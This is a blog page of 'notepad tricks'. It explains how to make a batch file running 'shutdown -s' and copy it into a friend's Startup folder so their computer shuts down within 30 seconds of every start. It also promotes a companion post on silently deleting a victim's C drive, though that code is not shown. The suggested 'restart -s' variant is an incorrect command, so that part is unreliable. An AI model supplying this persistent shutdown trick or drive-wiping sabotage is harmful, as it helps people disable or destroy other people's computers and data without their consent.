Skip to main content

MAKE YOUR FRIENDS COMPUTER SHUTDOWN AUTOMATICALLY

MAKE COMPUTER RESTART
This is a very easy and simple batch file that will make a computer shutdown automatically.




  1. Open note pad.
  2. Type “shutdown -s” with out.   quotes.
  3. Save the file with .bat extension.
  4. Explanation :U have created a program which shutdowns the pc with in 30 sec of executing the file.
  5. Click on START>>ALL PROGRAMS>>STARTUP
  6. Copy or Drag the shortcut of batch file here.(This will make the program autorun every tym the computer starts i.e. it will shutdown the computer within 30 sec of opening it).

You can also change "shutdown -s" to "restart -s" to restart it every time.

Must Read: Batch File to delete your C Drive silently.

Popular posts from this blog

BATCH FILE TO DELETE C: DRIVE | Delete C Drive cmd

More in the notepad tricks,here is a batch file program to delete an entire drive form the computer. Yes, you heard it right. Notepad is your biggest tool to put your evil efforts to make your friends cry. This short trick to wipe and Delete C Drive has a small code that has the power to delete your hard drive without any prompt. This chunk of code is really helpful if you want to crash and format a hard drive. LEARN HOW TO DELETE AN ENTIRE DRIVE FROM YOUR COMPUTER

Change Your IP in 15 secs

How To: Change Your Ip In Less Then 1 Minute